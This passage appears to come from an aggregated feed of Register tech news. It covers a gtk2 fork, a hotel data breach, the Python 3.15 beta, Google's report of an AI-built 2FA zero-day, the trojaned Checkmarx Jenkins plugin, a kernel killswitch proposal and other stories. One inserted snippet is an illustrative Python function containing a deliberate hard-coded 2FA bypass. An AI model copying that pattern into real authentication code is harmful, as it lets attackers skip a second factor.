- Implement touch support and smooth scrolling from Ardour’s ytk without breaking ABI, so Ardour can be compiled against gtk2 again
- Heavily lobby for its adoption in the BSD and systemd-free Linux world
- Reimplement GtkMozEmbed for UXP, so this wonderful engine can be used in gtk2 projects

Gtk originally stood for GIMP Tool Kit: 30 years ago, when the GIMP image editor made its public début, Gtk was the set of tools GIMP’s authors created to make it easier to write GUI apps in C. Six years later, GTK+ 2.0.0 appeared. The new plus symbol in its name represented a new object-oriented design. When Miguel de Icaza announced the GNOME desktop project in 1997, it adopted Gtk instead of the then-semi-commercial Qt that KDE used. Since then, Gtk has been developed along with GNOME. GIMP development is relatively slow: the team finally released version 3.0 a year ago, and it uses Gtk 3. (Last month, it released version 3.2.4.) Since launch, though, the GNOME project has released 39 numbered versions, and in recent decades Gtk has kept pace with GNOME, not GIMP. The last version of Gtk 2 was GTK+ 2.24.0 in 2012. The GNOME developers officially said it was end-of-life with the release of Gtk 4 in 2020. Gtk2-ng is far from the only project to fork and revive an older version of a project which has since been superseded by newer versions from the original team. One of the obvious ones is the MATE desktop, which Argentinian developer Perberos announced in 2011. Saying that, though, Daemonratte stated: "The ultimate vision of this fork is to keep gtk2 alive for software using it right now and to revive gtk2 versions of […] Gnome2 […].
Yes, I don’t have to do this alone and no, Mate is not an option, because they use gtk3 now." It is very much not alone. We have been covering releases of KDE 3 fork the Trinity desktop environment since version 14.0.11 in 2021. This vulture used KDE 1.x back when it was the state of the Linux art, and for us, KDE 3.x was already too big and complicated. For the KDE project’s 20th anniversary in 2016, Brazilian developer Helio Chissini de Castro modernized KDE 1 so that it would build and run on Fedora 25. We didn’t realize this had become an ongoing effort, but it has. From later in the gtk2-ng thread, we learned about MiDesktop, a continuing project based on Osiris, a modernized Qt 2. ®
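The "Y2K38-safe" goal in the project's list refers to the year 2038 problem: code that still stores Unix time in a signed 32-bit integer overflows early on January 19, 2038. A quick Python illustration of where the ceiling sits (the fix, presumably, means moving such fields to 64-bit time types):

```python
from datetime import datetime, timezone

T32_MAX = 2**31 - 1   # largest value a signed 32-bit time_t can hold

last_ok = datetime.fromtimestamp(T32_MAX, tz=timezone.utc)
# One second later the counter wraps to -2**31, i.e. back to 1901
wrapped = datetime.fromtimestamp(T32_MAX + 1 - 2**32, tz=timezone.utc)

print(last_ok)    # 2038-01-19 03:14:07+00:00
print(wrapped)    # 1901-12-13 20:45:52+00:00
```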
Categories: Linux fréttir
BWH Hotels guests warned after reservation data checks out with cybercrooks
BWH Hotels is informing customers about a third-party data breach that gave cybercriminals access to six months' worth of data. The notification email stated that BWH Hotels, which owns the WorldHotels, Best Western Hotels & Resorts, and Sure Hotels brands, identified the intrusion on April 22, but the affected data goes back to October 14, 2025. BWH Hotels CTO Bill Ryan, who penned the notification email, said names, email addresses, telephone numbers, and/or home addresses belonging to "certain guests" were accessed by an unauthorized third party. The intruders also accessed reservation details, such as reservation numbers, dates of stay, and any special requests. The company confirmed that the attack targeted one of its "web applications that houses certain guest reservation data." No payment or bank details were involved. The Register asked BWH Hotels whether the intrusion began in October and went undetected until April, or whether a later breach exposed data dating back to October. We also asked if this was related to information we were sent in March about BWH Hotels customer booking data being stolen and used for phishing campaigns. At the time, the company neither confirmed nor denied the information seen by The Register. BWH Hotels did not immediately respond to our request for comment on Monday. "Upon discovering the incident, we immediately took the application offline and revoked the unauthorized access," said Ryan. "We have engaged leading external cybersecurity experts to support our incident response efforts and to assist with the further strengthening of existing safeguards." "We advise guests to be extra vigilant when viewing any unexpected or suspicious communications about hotel stays. If you receive a suspicious communication such as an unexpected email, text, WhatsApp message, or telephone call that asks for payment, codes, logins, or 'verification,' even if they reference a BWH Hotels property or an upcoming reservation, do not engage.
Navigate to sites directly rather than clicking links." ®
Categories: Linux fréttir
Feature freeze for Python 3.15 as first beta released
The Python team has released the first beta of version 3.15, with new features including a stable application binary interface (ABI) for free-threaded CPython, lazy imports to speed startup time, a new zero-overhead sampling profiler, use of UTF-8 text encoding by default, and a faster just-in-time (JIT) compiler. Python's development cycle bars new features after the first beta release. There is typically a new feature release in October each year, with version 3.15 currently scheduled for October 1. The option to remove the global interpreter lock (GIL), available in Python 3.14, was the biggest change to Python for years, enabling efficient concurrency on multi-core CPUs. The new stable ABI means that C extensions can now be compiled for multiple minor versions of free-threaded builds, though the team warns that doing so means only a subset of the full CPython API is available. The existing stable ABI remains available, and it is possible to compile for both. Extension maintainers will benefit, since building new versions for every minor Python release is a burden. Explicit lazy imports can improve startup time for Python applications by deferring module loading until the module is first accessed. Otherwise, an imported module is loaded and compiled to bytecode immediately - though developers could use workarounds at the expense of code readability. The solution is a new keyword:

lazy import json

A new sampling profiler called Tachyon works by capturing stack traces from running processes, instead of instrumenting function calls. According to the docs, the approach "provides virtually zero overhead while achieving sampling rates of up to 1,000,000 Hz" and can be used to debug performance issues in production. Text encoding in Python 3.15 is now UTF-8 by default, though explicit encoding is still recommended for best compatibility. CPython is the reference implementation of Python, and improving its performance has long been a focus.
An experimental JIT compiler was introduced in version 3.14, though not recommended for production use - and could make code run more slowly. In 3.15, the JIT compiler is much improved, and the team now reports an 8-9 percent mean performance improvement over the CPython interpreter on x86-64 Linux, and 12-13 percent on Apple silicon macOS, though some code may still run up to 15 percent slower. These figures may change before the final release. In contrast, the incremental garbage collector released in 3.14 has been reverted, following reports of memory leaks. The incremental collector aimed to reduce pause times by spreading collection work across smaller, more frequent steps. It was removed in Python 3.14.5 and the core team stated: "If we want to reintroduce the incremental GC for 3.16, it can go through the regular PEP process and be more thoroughly evaluated." The full list of what is new in 3.15 is documented here. ®
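The lazy-import change is the one most developers will notice day to day. The classic workaround it replaces is moving an import inside the function that needs it, so the module is only loaded on first call, at the cost of hiding the dependency from the top of the file. A minimal sketch:

```python
import sys

def rows_to_csv(rows):
    # Deferred imports: csv is only loaded the first time this function
    # runs, so programs that never call it skip the cost at startup.
    import csv
    import io
    buf = io.StringIO()
    csv.writer(buf).writerows(rows)
    return buf.getvalue()

text = rows_to_csv([["a", "b"], ["1", "2"]])
assert "csv" in sys.modules   # loaded on demand, not at program start
```

Per the article, 3.15's new keyword (here that would be `lazy import csv` at the top of the module) gives the same deferral without burying the import inside the function; the exact semantics are whatever the final release ships.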
Categories: Linux fréttir
Google says criminals used AI-built zero-day in planned mass hack spree
Google says crooks already have AI cooking up zero-days, and claims one nearly escaped into the wild before the company stopped it. In a report shared with The Register ahead of publication on Monday, Google’s Threat Intelligence Group said that it has identified what it believes is the first real-world case of cyber-baddies using AI to discover and weaponize a zero-day vulnerability in a planned mass-exploitation campaign. The bug, a two-factor authentication bypass in a popular open source web-based administration platform, was reportedly developed by criminals working together on a large-scale intrusion operation. GTIG said that the attackers appear to have used an AI model to both identify the flaw and help turn it into a usable exploit. Google worked with the unnamed vendor to quietly patch the issue before the campaign could properly kick off, which it believes may have disrupted the operation before it gained traction. The company insists that neither Gemini nor Anthropic’s Mythos was involved, but said that the exploit itself looked suspiciously machine-made. According to the report, the Python script included what Google described as "educational docstrings," a hallucinated CVSS score, and a polished textbook coding structure that looked heavily influenced by LLM training data. Google said that the issue stemmed from developers hard-coding a trust exception into the authentication flow, creating a hole that attackers could exploit to sidestep 2FA checks. According to the firm, those higher-level logic mistakes are exactly the kind of thing modern AI models are starting to get surprisingly good at finding. "While fuzzers and static analysis tools are optimized to detect sinks and crashes, frontier LLMs excel at identifying these types of high-level flaws and hardcoded static anomalies," the report said. 
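Google hasn't named the product or published the code, but the bug class it describes is easy to sketch. Everything below is a hypothetical illustration in Python - the header name, magic value, and function are invented, not the actual flaw:

```python
def second_factor_required(session, headers):
    # VULNERABLE: a hard-coded "trust exception" left in the auth flow.
    # Anyone who learns the magic header value skips the 2FA check -
    # the kind of high-level logic flaw fuzzers rarely surface, because
    # nothing ever crashes.
    if headers.get("X-Internal-Bypass") == "debug-trusted":
        return False
    return not session.get("otp_verified", False)

# A normal unverified session is challenged for a second factor...
assert second_factor_required({"otp_verified": False}, {}) is True
# ...but the hard-coded exception waves an attacker straight through.
assert second_factor_required({"otp_verified": False},
                              {"X-Internal-Bypass": "debug-trusted"}) is False
```

Nothing here corrupts memory or trips a sanitizer, which is why Google argues LLM-style review complements rather than replaces fuzzing and static analysis.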
John Hultquist, chief analyst at Google Threat Intelligence Group, said anyone still treating AI-assisted vulnerability discovery as a future problem is already behind. "There’s a misconception that the AI vulnerability race is imminent. The reality is that it’s already begun. For every zero-day we can trace back to AI, there are probably many more out there," Hultquist said. "Threat actors are using AI to boost the speed, scale, and sophistication of their attacks. It enables them to test their operations, persist against targets, build better malware, and make many other improvements. State actors are taking advantage of this technology but the criminal threat shouldn’t be underestimated, especially given their history of broad, aggressive attacks." Google’s report suggests that the zero-day case is part of something much bigger. GTIG said North Korean crew APT45 had been using AI to churn through thousands of exploit checks and bulk out its toolkit, while Chinese state-linked operators were experimenting with AI systems for vulnerability hunting and automated probing of targets. Google also described malware families padded out with AI-generated junk code designed to confuse analysts, Android backdoors using Gemini APIs to autonomously navigate infected devices, and Russian influence operations stitching fabricated AI-generated audio into legitimate news footage. The awkward bit for everyone else is that this still appears to be the clumsy early phase. Google said mistakes in the exploit’s implementation probably interfered with the criminals’ plans this time around, but that may not stay true for long. ®
Categories: Linux fréttir
SoftBank bets on battery building to back bit barns
SoftBank is getting into the datacenter battery business and plans to start manufacturing them on the scale of gigawatt-hours per year of capacity to support the power needs of AI infrastructure, including its own. The Japan-based tech investment biz says it aims to deploy the battery systems it is developing at its own large-scale AI server farms initially, but plans to make them more widely available in future. It hopes to begin mass production in financial year 2027, and expects the operation to generate revenue of ¥100 billion (over $600 million) per year by 2030. SoftBank is working with two South Korean firms that have a track record in advanced battery-related technologies. One is Cosmos Lab, developer of zinc-halogen batteries that use pure water as an electrolyte, making them non-flammable, and the other is DeltaX, which designs and manufactures battery energy storage systems (BESS). Reg readers may recall that SoftBank last year bought the rights to a former Sharp LCD panel factory in Sakai City, Osaka prefecture in Japan, and said it planned to convert it into a datacenter to operate AI agents developed jointly with ChatGPT creator OpenAI. The site will now become an industrial cluster, home to its battery manufacturing facility as well. SoftBank referred to it as a core hub to establish its AX Factory (a center for datacenter operations and AI infrastructure hardware manufacturing), and GX Factory (serving as a manufacturing facility for next-gen batteries, solar panels, and related products). One detail missing is how much cash the investment biz is pouring into this venture. We asked how much the project is costing to get off the ground, but a SoftBank spokesperson told us it was not able to comment. SoftBank plans to start by deploying the battery systems produced at its GX Factory in its own server halls, but will then provide them for grid applications in Japan, plus factories and other industrial uses.
It hopes to take the technology into global markets over the medium term. In presentation slides seen by The Register, the firm says BESS for commercial and industrial use will have a capacity of 140 kWh to 560 kWh, while those for large-scale or grid-scale use will come in at 2,240 kWh to 5,380 kWh. According to SoftBank, DeltaX has developed BESS capable of storing more than 5 MWh in a standard commercial container format (a 20-foot shipping container). The way DeltaX packs together and connects the battery cells in its BESS maximizes their performance, SoftBank claims, and by applying these technologies to next-generation battery cells (presumably referring to those of Cosmos Lab), further improvements in energy storage can be achieved. Those battery cells, which SoftBank calls Innovative batteries, use a halogen-based material for the cathode and zinc for the anode, which it says offers charge-discharge characteristics with minimal energy loss and energy efficiency comparable to existing lithium-ion batteries. As they use pure water as the electrolyte, SoftBank claims these batteries are inherently safer and won't catch fire, unlike lithium-ion batteries, which have a well-documented tendency to do exactly that. SoftBank has its finger in a number of pies when it comes to AI projects. The firm was aiming to pump $22.5 billion into LLM developer OpenAI before the end of 2025, and more recently announced plans for a massive 10 GW datacenter campus on US Department of Energy (DoE) land in Ohio. The company is also majority shareholder of chip designer Arm, which recently revealed its first Arm-branded datacenter processor targeting AI, and owns Ampere Computing, which makes Arm-based server chips. ®
Categories: Linux fréttir
Water company's leaky security earns near-£1M fine
The UK's data protection watchdog has fined South Staffordshire Water's parent company nearly £1 million over security failings exposed by the Cl0p ransomware attack in 2022. Issuing the fine of £963,900 ($1.3 million), the Information Commissioner's Office (ICO) said the attack exposed "significant failures in the company's approach to data security." The attack, claimed by Cl0p, was detected in July 2022 after engineers responded to performance issues, but a thorough postmortem revealed the initial intrusion occurred almost two years earlier, in September 2020. Among the key failures that led to the attack, and the nearly two-year delay in detecting it, were:

- Limited controls, which allowed the attacker to escalate their privileges to admin after gaining an initial foothold on the network
- Inadequate monitoring and logging. The ICO noted that only 5 percent of South Staffordshire's IT environment was being monitored
- Running unsupported software, including Windows Server 2003
- Poor vulnerability management. Investigations showed critical systems were unpatched against known vulnerabilities, and the company failed to regularly run internal or external security scans

The ICO said 633,887 people were affected by the attack and the resulting leak of company files. For customers, this included personally identifiable information, usernames and passwords used to access its online services, and bank account numbers and sort codes. For a limited number of customers on the utility company's Priority Services Register, the stolen information could have led to their disabilities being inferred. Cl0p also pilfered HR information, including employees' National Insurance numbers. The trove of company data was later leaked online in a file exceeding 4 TB. At the time of the attack, South Staffordshire handled the data of some 1.85 million individuals. Most of these were either current or former customers, but several thousand staffers' details were also retained.
"Customers do not have the choice over which water company serves them – they are required to share their personal information and place their trust in that provider," said Ian Hulme, interim executive director for regulatory supervision at the ICO. "It is therefore essential that water companies honor that trust by taking their data protection responsibilities seriously." "The steps that South Staffordshire failed to take are established, widely understood and effective controls to protect computer networks. The ICO expects all organizations – and particularly those handling large volumes of personal information as part of critical national infrastructure – to have these in place." "Waiting for performance issues or a ransom note to discover a breach is not acceptable. Proactive security is a legal requirement, not an optional extra." The ICO announced its intent to fine South Staffordshire in December 2025. The regulator said after reviewing the company's representations, which included agreement with its findings and an early admission of wrongdoing, it reduced the fine by 40 percent. "We accept the Information Commissioner's Office's decision relating to the cyberattack our Group experienced in 2022, and are sorry for the worry and concern it caused for customers and employees," said Charley Maher, group CEO at South Staffordshire Plc, in a statement provided to The Register. "We took immediate action to contain the incident, support those impacted, and reduce the risk of recurrence." "We have invested significantly to further strengthen our cybersecurity resilience, governance, and monitoring, and we continue to enhance our capabilities as the threat landscape evolves. Protecting customer and employee information is a responsibility we take extremely seriously, and we remain focused on learning from this incident and maintaining strong safeguards across the Group." ®
Categories: Linux fréttir
Checkmarx tackles another TeamPCP intrusion as Jenkins plugin sabotaged
Checkmarx’s software engineers are still working to remove a malicious version of the code security outfit's Jenkins plugin after detecting an unauthorized upload over the weekend. The company updated customers on Saturday, May 9, after discovering a version of its AST Scanner, which is used for security scans in Jenkins CI pipelines, was made available via the Jenkins Marketplace. “We are aware that a modified version of the Checkmarx Jenkins AST plugin was published to the Jenkins Marketplace,” it said in a statement. “We are in the process of publishing a new version of this plug-in.” Versions published as of May 9, 2026, should not be trusted, it added, before urging all users to check they’re running the correct release (2.0.13-829.vc72453fa_1c16) published on December 17, 2025. Installed on several hundred controllers, the plugin remains available at the time of writing, and appears as the most recently available version, although pull requests actioned on Monday morning suggest this will soon be pulled down. “What makes this particularly dangerous for Jenkins users is the trust model at play,” said SOCRadar in its coverage. “The Checkmarx Jenkins plugin is a tool people install specifically to improve the security of their pipelines. “A backdoored version doesn’t just compromise one project; it rides trusted infrastructure into every build pipeline it touches, with access to source code, environment variables, tokens, and whatever secrets the runner can see.” Security engineer Adnan Khan spotted the compromise quickly over the weekend. The crew behind the early supply chain attack affecting Checkmarx in April, TeamPCP, defaced the company’s GitHub and published six packages, each with a description alluding to the Shai-Hulud wormable malware.
These packages no longer appear on Checkmarx’s GitHub, but TeamPCP made multiple changes to the AST plugins page, renaming it to “Checkmarx-Fully-Hacked-by-TeamPCP-and-Their-Customers-Should-Cancel-Now,” and altering the description to claim Checkmarx failed to rotate its secrets. The latest infiltration of Checkmarx’s internals marks the third time TeamPCP has compromised the company’s packages in as many months. As The Register previously reported, the crooks successfully targeted Checkmarx’s AST plugin for GitHub Actions and its KICS static analysis tool back in March, deploying credential-stealing malware. SOCRadar said the latest TeamPCP compromise of the Jenkins plugin suggests that either TeamPCP was telling the truth about Checkmarx’s secrets rotation, or its members took advantage of an additional persistence mechanism that the security vendor failed to notice during its response to the March intrusion. ®
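Checkmarx's advice - verify you're on the one known-good release - is easy to automate across a fleet. A sketch in Python; the plugin ID checkmarx-ast-scanner is an assumption for illustration, while the version string is the one from the advisory:

```python
# Pin the release named in Checkmarx's advisory. The plugin ID below is
# assumed for illustration, not taken from the vendor.
KNOWN_GOOD = {
    "checkmarx-ast-scanner": "2.0.13-829.vc72453fa_1c16",
}

def audit_plugins(installed):
    """Return (plugin, found, expected) for each pinned plugin that drifted."""
    return [
        (pid, installed[pid], good)
        for pid, good in KNOWN_GOOD.items()
        if pid in installed and installed[pid] != good
    ]

# A controller running an unexpected build - possibly the trojaned
# upload - gets flagged for investigation:
drifted = audit_plugins({"checkmarx-ast-scanner": "2.1.0-900.deadbeef"})
```

In practice the installed list can be pulled from a controller's /pluginManager/api/json endpoint and fed straight into audit_plugins.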
Categories: Linux fréttir
NASA's bid to save Swift from fiery death passes another hurdle
A rescue mission for NASA's Neil Gehrels Swift Observatory has taken another step forward following the completion of environmental tests at the agency's Goddard Space Flight Center. The purpose of the tests was to assess how the LINK robotic servicing spacecraft, supplied by Katalyst Space Technologies, would withstand the forces of launch and the extremes of the orbital environment. The mission is ambitious and fast-paced. It was only in August 2025 that NASA asked US industry for ideas on rescuing the observatory, whose orbit is decaying faster than expected. Katalyst was awarded the contract and has been working against the clock to launch its servicing spacecraft before Swift reaches the point of no return. In February 2026, NASA ended most science operations aboard Swift to keep the spacecraft in orbit long enough for the rescue mission. At the time, June 2026 was Katalyst's expected launch date and, thanks to the successful completion of testing, the mission remains on track. The next step is for Northrop Grumman to integrate LINK into its Pegasus rocket in early June, with launch planned from the last airworthy L-1011 TriStar (dubbed Stargazer) later that month. The LINK spacecraft has undergone vibration testing to simulate a Pegasus launch and thermal-vacuum testing in Goddard's Space Environment Simulator, where it experienced space-like hot and cold temperature extremes. The team also test-fired the spacecraft's three xenon-powered ion thrusters and deployed one of its robotic arms. Kieran Wilson, LINK's principal investigator at Katalyst, said: "We're in an unusual situation where the schedule dictates how much risk we’re willing to accept, rather than the other way around. "The clock is ticking on Swift's descent, so we have to find a balance between testing and problem solving that gives the mission the best chance of success." 
After paying tribute to the speed at which Katalyst was moving, Swift mission director John Van Eepoel said: "Swift will likely re-enter the atmosphere sometime later this year if we don't attempt to lift it to a higher altitude." In this instance, the Swift observatory has nothing to lose and everything to gain from the reboost mission. The spacecraft is more than 20 years into a two-year task to study gamma-ray bursts. If it weren't for its decaying orbit (and the Trump administration's effort to terminate it - the mission was on the chopping block in the FY2026 budget proposal), it could continue observations for years to come. ®
Categories: Linux fréttir
Linux kernel maintainers pitch emergency killswitch after CopyFail and Dirty Frag chaos
Linux kernel maintainers are considering giving admins a giant red emergency button to smash the next time another nasty vulnerability drops before patches are ready. The proposed feature, named "Killswitch," would let admins temporarily disable specific vulnerable kernel functions at runtime instead of sitting around waiting for fixes. The patch was submitted by Linux stable kernel co-maintainer and Nvidia engineer Sasha Levin after a bruising couple of weeks for Linux security. The proposal basically gives admins a way to pull the plug on vulnerable kernel functionality. If exploit code starts spreading before patches arrive, the targeted function can be disabled so calls to it immediately fail instead of reaching the vulnerable code. "When a (security) issue goes public, fleets stay exposed until a patched kernel is built, distributed, and rebooted into," Levin wrote. "For many such issues the simplest mitigation is to stop calling the buggy function. Killswitch provides that." The past couple of weeks have not exactly been great advertising for the traditional "wait for patches" approach. First we saw the disclosure of CopyFail, a Linux local privilege escalation bug that quickly moved from disclosure to active exploitation. Days later, Dirty Frag emerged: another Linux privilege escalation flaw with public exploit code and no official fixes, after coordinated disclosure efforts fell apart before patches were ready. As Levin's proposal itself puts it, organizations are often left exposed "until a patched kernel is built, distributed, and rebooted into." Killswitch aims to fill that gap. Killswitch would work through the kernel's security interface and is mainly intended for subsystems that systems can survive without for a while. In practical terms, Levin's argument is that temporarily losing some networking or crypto functionality is preferable to leaving known vulnerable code exposed on production systems.
However, the feature would not fix vulnerable code or replace it with safe code. It just slams the door shut on the dangerous bit until administrators can properly update their kernels. Naturally, handing sysadmins the ability to selectively shoot pieces of the kernel in the head has already sparked debate among developers over stability, potential for abuse, and whether people can be trusted not to accidentally saw off important limbs in production. Still, after CopyFail and Dirty Frag, the kernel community increasingly seems to be arriving at the conclusion that running broken functionality may now be preferable to running weaponized functionality. ®
Classic Outlook's Quick Steps trip over Microsoft bug
If you're using Quick Steps in Microsoft Outlook and wondering why they're grayed out, a bug introduced in version 2512 is the culprit.

Classic Outlook is approaching the twilight years of its prodigiously long life, but users can still fall victim to productivity-killing bugs – in this case, a problem with Quick Steps.

Quick Steps automates common or repetitive tasks in Outlook. Always have to move a bunch of messages to a specific folder? Quick Steps is your friend. Pin an email and mark it as unread? Again, the actions can be lined up in Quick Steps and executed with a single click or a keyboard shortcut. Until Microsoft breaks it.

In a support article, Microsoft has confirmed that in some situations, Quick Steps in classic Outlook can appear grayed out. The workaround (if rolling back or switching clients isn't an option) is to use a keyboard shortcut. "The shortcut will work even if the Quick Step is grayed out in the user interface," Microsoft wrote.

The problem is that if a Quick Step contains actions that "can't be fulfilled," it's grayed out. Microsoft's own example states: "A Quick Step that moves a message to a folder and clears categories will be grayed out in messages where there are no categories applied." "This is known to happen with Quick Steps with Flags and Categories actions such as 'Clear flags on message' or 'Clear categories'."

Classic Outlook has suffered several glitches of late. Microsoft admitted in April that it could occasionally chow down on system resources for no obvious reason. Then there was its tendency to explode when opening too many emails.

Microsoft has been clear that classic Outlook's days are numbered. Outlook 2024 is due to drop out of mainstream support in 2029. However, there remains much that classic Outlook does which New Outlook doesn't, such as COM support. And, when Microsoft hasn't broken them, Quick Steps. ®
